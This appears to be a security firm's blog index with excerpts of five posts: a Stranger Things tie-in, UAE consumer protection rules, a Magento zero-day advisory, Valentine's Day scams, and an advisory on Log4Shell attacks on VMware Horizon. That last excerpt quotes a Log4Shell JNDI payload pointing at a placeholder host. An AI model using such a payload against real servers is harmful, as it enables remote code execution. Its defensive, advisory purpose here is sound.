Blog List

Categories
5 Cybersecurity lessons to learn from Stranger Things

5 Cybersecurity lessons to learn from Stranger Things 

Netflix’s original series ‘Stranger Things‘ season-4 is on its way to a worldwide release today. As the plot deepens every season, viewers are rooting hard for their favourite characters. From the power-house Eleven to lovable Steve, everyone has made their way to our techno-savvy hearts. You’d be mighty pleased to know that this series not […]


Consumer Protection Regulation

A summary of Article 6 requirements for Consumer Protection Regulation (CPR) by the Central Bank of UAE (CBUAE) With the ever-evolving digital landscape and advancements in technologies that process consumer data, the need for consumer protection and associated rights has grown exponentially. Case in point, the Central Bank of the UAE (CBUAE) has issued the Consumer […]


Attackers are actively exploiting a critical zero-day vulnerability in Adobe Commerce and Magento Open Source products

Severity: Critical INTRODUCTION Adobe has addressed critical Magento Zero-Day Vulnerability (CVE-2022-24086) that is under active exploitation by threat actors. The security flaw impacts Adobe Commerce and Magento Open Source products. Successful exploitation of this vulnerability allows a remote attacker to execute arbitrary code and may result in the complete compromise of a vulnerable system. The […]


Breaking up on Valentine’s Day!

Valentine’s Day is approaching fast. And on this day, if anyone is more active than lovers around the world, it is the cybercriminals.  Cybercriminals always look for opportunities to take advantage of oblivious online consumers. From counterfeit gift scams to fake dating apps, their presence is everywhere.  Research from security firm Check Point revealed that over […]


Threat actor groups are targeting VMware Horizon servers running versions affected by Log4Shell vulnerabilities

Severity: High Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon. Attack Chain:• In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to ${jndi:ldap://example.com} targeting vulnerable VMware Horizon servers.• The attack exploits the Log4Shell vulnerability […]


Top